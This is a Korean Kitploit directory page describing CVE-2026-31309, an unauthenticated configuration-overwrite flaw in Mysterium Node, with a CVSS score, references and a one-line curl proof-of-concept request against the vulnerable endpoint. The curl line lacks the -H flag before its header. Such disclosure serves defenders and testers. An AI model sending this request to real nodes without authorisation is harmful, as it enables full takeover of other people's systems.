Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-31309 — Mysterium Node v1.36.0 이전의 부적절한 접근 제어 | Kitploit
도구/GitHubGitHub/sch8ill/cve-2026-31309
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Mysterium Node v1.36.0 이전의 부적절한 접근 제어

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2026-31309: Mysterium Node v1.36.0 이전 버전의 부적절한 접근 제어

Mysterium Node의 /tequilapi/config/user 엔드포인트의 부적절한 권한 부여로 인해 v1.21.1-rc0부터 v1.36.0 이전까지의 버전에서 인증되지 않은 공격자가 노드 구성을 임의로 덮어쓰고 조작된 POST 요청을 통해 전체 노드를 장악할 수 있습니다.

CVSS

점수: 9.8 (CRITICAL)

벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

발견자: Till Schacht.

References

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
도구 다운로드